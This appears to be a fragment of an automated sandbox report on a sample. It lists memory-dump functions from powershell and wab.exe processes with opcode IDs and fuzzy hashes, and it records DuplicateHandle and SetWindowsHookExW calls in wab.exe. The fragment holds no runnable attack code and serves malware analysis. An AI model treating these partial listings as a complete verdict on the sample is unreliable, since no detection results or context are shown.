                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f1decbf64e4f060c845fa06daa4a817f51a3a7d9fc6999ad1dba3b61acda51c9
                                                                                      • Instruction ID: 3b68736ae8e521d0ebf0128423b1bc006c8571db8e80660e02c75897d89b98ef
                                                                                      • Opcode Fuzzy Hash: f1decbf64e4f060c845fa06daa4a817f51a3a7d9fc6999ad1dba3b61acda51c9
                                                                                      • Instruction Fuzzy Hash: 3D5126B1A093859FC7138B64C818A66BFB1AF86210F2DC1DBD5649F2D3C731D85AC791
                                                                                      Function 04439219 Relevance: .1, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e859eaa262dcba090c1369736080b9f7b41e5170c8ba0c7ad4f54c71bbf35cb
                                                                                      • Instruction ID: ca0f6fa06e7a23375e62ce3e803acf3fb3970d379c461d27da8f6c21428e3e52
                                                                                      • Opcode Fuzzy Hash: 5e859eaa262dcba090c1369736080b9f7b41e5170c8ba0c7ad4f54c71bbf35cb
                                                                                      • Instruction Fuzzy Hash: 69419D71A002008FDB18DF64C954AAE7BF6EF8D725F08506EE402EBBA0CB74AC45CB50
                                                                                      Function 04432C58 Relevance: .1, Instructions: 111COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 887842fae6d02694aac84be53bed52478ecf4d3d17779cdeb7aba95bd68a4075
                                                                                      • Instruction ID: 037147b71c5b3abed32c3a238a82f670be9abecab96e51ec844fc02131ee18ec
                                                                                      • Opcode Fuzzy Hash: 887842fae6d02694aac84be53bed52478ecf4d3d17779cdeb7aba95bd68a4075
                                                                                      • Instruction Fuzzy Hash: 57411774A00609DFCB05CF59C598DAAFBB1FF88310B25869AD945AB3A4C771FC51CBA0
                                                                                      Function 0716E158 Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe4688f72d53ef7a84316875a9e694e3970288003358297e870570984c58916f
                                                                                      • Instruction ID: d3e6415b016cd249fc464af438827ae6114d35277d5879933ef7de1088dfad1f
                                                                                      • Opcode Fuzzy Hash: fe4688f72d53ef7a84316875a9e694e3970288003358297e870570984c58916f
                                                                                      • Instruction Fuzzy Hash: 61317CF5605306DFDF224A65840877A7B637F82640F0502BED810DB2C1E736C968C762
                                                                                      Function 0716779E Relevance: .1, Instructions: 102COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 63512b690f7c3bc2c7f7bef3cf5d37d5558e76f0fc0f66e1faa2526daee7bce5
                                                                                      • Instruction ID: 3fe4a797555f9c4b7c5584a23531301564de31961d367d375bbec7dfd4eed452
                                                                                      • Opcode Fuzzy Hash: 63512b690f7c3bc2c7f7bef3cf5d37d5558e76f0fc0f66e1faa2526daee7bce5
                                                                                      • Instruction Fuzzy Hash: 59317574B00214ABE714ABA4C855FAF7AA3AFC5754F10C424E901AF7D1CFB6DC858BA1
                                                                                      Function 071608C4 Relevance: .1, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2436e03f6309b2dd924e12c0ef9d780df1ba7ef7077d384c2282ab090c073d24
                                                                                      • Instruction ID: d634f33c98aa64122dae9a1df43538260c941389e33984ca461a0adf9ebd674b
                                                                                      • Opcode Fuzzy Hash: 2436e03f6309b2dd924e12c0ef9d780df1ba7ef7077d384c2282ab090c073d24
                                                                                      • Instruction Fuzzy Hash: F6310AF5A04306DFDB158E65C448F7A7BB6EF89741F15806AD80C872D1E735C8A0CBA1
                                                                                      Function 044331C8 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b60c89b19842bf06553aeb0c55b448369e6c1dca76ff12fb9c505fad830c6aa5
                                                                                      • Instruction ID: 36e1cccda425de0f0bd6ed9a4acd27d4fa58f3147cb320aabd5de33cec4f2317
                                                                                      • Opcode Fuzzy Hash: b60c89b19842bf06553aeb0c55b448369e6c1dca76ff12fb9c505fad830c6aa5
                                                                                      • Instruction Fuzzy Hash: A7211A74A042199FCB00CF98D4909AAFBB5FB89310B14859AD919EB352C735ED41CBA1
                                                                                      Function 0716CACF Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e16a13025fab62911dd3c4a008c1a2e4afbb3bd2334444a3e42f8fc4b151c570
                                                                                      • Instruction ID: fd4bdf65e735d24478d77db162ade2b15dbf4d2bc2903993ac7786ecdca7ebaa
                                                                                      • Opcode Fuzzy Hash: e16a13025fab62911dd3c4a008c1a2e4afbb3bd2334444a3e42f8fc4b151c570
                                                                                      • Instruction Fuzzy Hash: B3217FB064025A9BD7149B24C844BED7B72AB82314F1081A5D649AF781CBB6AD82CFE1
                                                                                      Function 044331B9 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f17f21f1157463ca71004e1b1fb67c6f56f0f7e403ee549e9cf9b698eef5d539
                                                                                      • Instruction ID: 163b6585a6d450e14734d642391f4e6b19150d839784964d9d53683bec5863e0
                                                                                      • Opcode Fuzzy Hash: f17f21f1157463ca71004e1b1fb67c6f56f0f7e403ee549e9cf9b698eef5d539
                                                                                      • Instruction Fuzzy Hash: 34214774A002099FCB01CF98D9809AEFBB5FF89310B14859AE919AB352C735FD41CBA1
                                                                                      Function 07160AAC Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2612357432.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5371bedab2194a87efd9e3ef64649c7d78ec5363c5df0c30d0db0d9077e03d3
                                                                                      • Instruction ID: 3bf9ea43c37ea6f1a476ec8a89013dfaf1256ec8dc894568a601913b224c35ae
                                                                                      • Opcode Fuzzy Hash: c5371bedab2194a87efd9e3ef64649c7d78ec5363c5df0c30d0db0d9077e03d3
                                                                                      • Instruction Fuzzy Hash: C4017878608391EFC31A4B28D894916BBB9FF8B359739856EC49887345C730ACD2CB60
                                                                                      Function 0443FEBF Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4a19fb5ce4cc6ea5fea658a8b0691d8696d69778e1e79e83128ef919564e6fb6
                                                                                      • Instruction ID: 63b0e07e1b332e184a5d87321411594c342524b4ba74cb7abf101e24464e4b93
                                                                                      • Opcode Fuzzy Hash: 4a19fb5ce4cc6ea5fea658a8b0691d8696d69778e1e79e83128ef919564e6fb6
                                                                                      • Instruction Fuzzy Hash: C0011935A00109EFCB14CF98D9809ADF7B2FB88324B248669D519A7655C732AC52CB90
                                                                                      Function 0443FBD4 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a67cbd88153d91bbd00e8be855bf30ebe5842ed4f2d7b80a1e5a598e7eb662c
                                                                                      • Instruction ID: 4eeeb6513082ef75871bfe357038bbc8eb83c4e0a55e38e223b9edd33ddea422
                                                                                      • Opcode Fuzzy Hash: 9a67cbd88153d91bbd00e8be855bf30ebe5842ed4f2d7b80a1e5a598e7eb662c
                                                                                      • Instruction Fuzzy Hash: 31F03075A00118DFCB40CB9CD8509ADF7BAFF8C221B248159E518A7255C736AC12CB50

                                                                                      Non-executed Functions

                                                                                      Function 04438398 Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2592375726.0000000004430000.00000040.00000800.00020000.00000000.sdmp, Offset: 04430000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4430000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3a2b00becd2bc1f2ed958a1e0e8ed7f587c0971a505dc7b38e03d4f6345f9ec6
                                                                                      • Instruction ID: c768ac25dc30df0fc0df7afe796ddd6ebc0f9b7495fac069153cabe5c487bcf7
                                                                                      • Opcode Fuzzy Hash: 3a2b00becd2bc1f2ed958a1e0e8ed7f587c0971a505dc7b38e03d4f6345f9ec6
                                                                                      • Instruction Fuzzy Hash: F2315C347056558FCB55DB39C4848AABBF6FF8620035445AAE142DBB72DA70ED18CBA0

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:5
                                                                                      Total number of Limit Nodes:0
                                                                                      execution_graph 13082 2737378 DuplicateHandle 13083 273740e 13082->13083 13084 2732278 13085 27322bc SetWindowsHookExW 13084->13085 13087 2732302 13085->13087

                                                                                      Executed Functions

                                                                                      Function 02737370 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 78 2737370-2737375 79 27373a2-273740c DuplicateHandle 78->79 80 2737377-27373a1 78->80 81 2737415-2737432 79->81 82 273740e-2737414 79->82 80->79 82->81
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027373FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: 07ee698eb50c49904ccf46b1dbdbd36901bdc81abd480f397519c178a3e71103
                                                                                      • Instruction ID: 27e2791abcdb963252b8d3474bd371fe953b11894301de8d7249f57a38209054
                                                                                      • Opcode Fuzzy Hash: 07ee698eb50c49904ccf46b1dbdbd36901bdc81abd480f397519c178a3e71103
                                                                                      • Instruction Fuzzy Hash: 2621F4B5D00249DFDB10CFA9D584ADEFBF4EF48324F14841AE914A3211D378A950CFA1
                                                                                      Function 02737378 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 85 2737378-273740c DuplicateHandle 86 2737415-2737432 85->86 87 273740e-2737414 85->87 87->86
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 027373FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: cf8bdd7156d36465249d41482d5c8d925cb89371e2bf980f8b057611c92d26a0
                                                                                      • Instruction ID: baa14f35f93182b23674805b8fc7294b3d9f7dfd982a8b9e21feb89140e8829e
                                                                                      • Opcode Fuzzy Hash: cf8bdd7156d36465249d41482d5c8d925cb89371e2bf980f8b057611c92d26a0
                                                                                      • Instruction Fuzzy Hash: C921E0B59002499FDB10CFAAD984ADEFFF4EB48324F14841AE918A3310D379A950CFA1
                                                                                      Function 02732270 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 90 2732270-27322c2 93 27322c4 90->93 94 27322ce-2732300 SetWindowsHookExW 90->94 97 27322cc 93->97 95 2732302-2732308 94->95 96 2732309-273232e 94->96 95->96 97->94
                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027322F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: ff4d69c55d6e5fb3def09b2be16b6586a643c9b64f326eeb8ccb956bb137eb53
                                                                                      • Instruction ID: 6707c3ba0a18039986ac4d01284d555f7aada1432eb1f11adb67202230bf7fcd
                                                                                      • Opcode Fuzzy Hash: ff4d69c55d6e5fb3def09b2be16b6586a643c9b64f326eeb8ccb956bb137eb53
                                                                                      • Instruction Fuzzy Hash: 03211875D002499FDB14CF9AC944BDEBBF4FF88310F10842AE455A7251DB78A940CFA1
                                                                                      Function 02732278 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 101 2732278-27322c2 103 27322c4 101->103 104 27322ce-2732300 SetWindowsHookExW 101->104 107 27322cc 103->107 105 2732302-2732308 104->105 106 2732309-273232e 104->106 105->106 107->104
                                                                                      APIs
                                                                                      • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 027322F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3357147883.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_2730000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID: HookWindows
                                                                                      • String ID:
                                                                                      • API String ID: 2559412058-0
                                                                                      • Opcode ID: 65383997068426c9fb2dbe258198a2d128a5c24b2455ee34a3fcee3594dc0250
                                                                                      • Instruction ID: 3caea2188897e690bb7e3373d0737fa75912524f521096aed257bd6160405181
                                                                                      • Opcode Fuzzy Hash: 65383997068426c9fb2dbe258198a2d128a5c24b2455ee34a3fcee3594dc0250
                                                                                      • Instruction Fuzzy Hash: 112115B5D002499FDB14CFAAC944BDEBBF4BF88310F108429E459A7250DB74A940CFA1
                                                                                      Function 026FD500 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17f26a75d98f73e567f0969c4b32f1daa9bf0f04ff517ce4327e6bae3abe93fb
                                                                                      • Instruction ID: a477dbd0876c971313216ff1e3922d9160b809616c749156c0acad951bfe7d9a
                                                                                      • Opcode Fuzzy Hash: 17f26a75d98f73e567f0969c4b32f1daa9bf0f04ff517ce4327e6bae3abe93fb
                                                                                      • Instruction Fuzzy Hash: 442125B2504204DFDF55DF14D9C0B2ABF62FB88318F20816DDA0A0B256C376E856CAA2
                                                                                      Function 026FD414 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 844d4f5f58bc0bcb3f805e6655a265442a6ed30fc4371c1fdad3a09cbbcb8117
                                                                                      • Instruction ID: cd19e9452df4b1eed3041c196f21315fd0a513c1d184515ad79ff98b0fe0fb53
                                                                                      • Opcode Fuzzy Hash: 844d4f5f58bc0bcb3f805e6655a265442a6ed30fc4371c1fdad3a09cbbcb8117
                                                                                      • Instruction Fuzzy Hash: 70210372504240EFDF49DF14D9C0F2ABF62FB84324F20C169DA090B256C376F456CAA2
                                                                                      Function 0270D0FC Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356748912.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_270d000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8fc988281079051e3c6bcfbe6f19cb8bc79dd9ed515e69af0dc5012135c7d888
                                                                                      • Instruction ID: 3cacf11d1a5031becd9911d9e23540092de6e93163c6724673ee135688517ede
                                                                                      • Opcode Fuzzy Hash: 8fc988281079051e3c6bcfbe6f19cb8bc79dd9ed515e69af0dc5012135c7d888
                                                                                      • Instruction Fuzzy Hash: 4B2107B5504304EFDB14DF54D9C0B26BBA1FB88314F20C56DD9094B292CB76DC5ACA61
                                                                                      Function 026FD4FB Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                      • Instruction ID: f7d149d628c64bd6b22519c9b1e4bb647da57ba1d30f9f4e2e3398edcc40e516
                                                                                      • Opcode Fuzzy Hash: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                      • Instruction Fuzzy Hash: 4B11B1B6504284CFCF15CF10D5C4B16BF62FB84318F24C5A9D9490B256C33AE456CBA2
                                                                                      Function 026FD40F Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356505903.00000000026FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 026FD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_26fd000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                      • Instruction ID: 6992c81e22815575957eb11ba293690f16989807ee59d0fb6d8b54771f13c965
                                                                                      • Opcode Fuzzy Hash: 19efff7c126650d5cb9b73f534a2037f7ec21590469f2fc0e01b49509d01f730
                                                                                      • Instruction Fuzzy Hash: F311AF76504280DFCF16CF10D5C4B1ABF62FB84324F24C5A9D9494B656C33AE45ACBA2
                                                                                      Function 0270D0F7 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.3356748912.000000000270D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0270D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_270d000_wab.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                                      • Instruction ID: af08ea75a12ba18f11c4ddc3b77497948c4b45947278de4a77fc0a1328ac2e1d
                                                                                      • Opcode Fuzzy Hash: 50f7e29a630608d0546145974b4e8461a6f7dcc6741a455d6d64f55d25f6ac08
                                                                                      • Instruction Fuzzy Hash: ED11DD75504384CFDB15CF50DAC4B15FBA2FB88328F24C6A9D8494B296C33AD84ACF62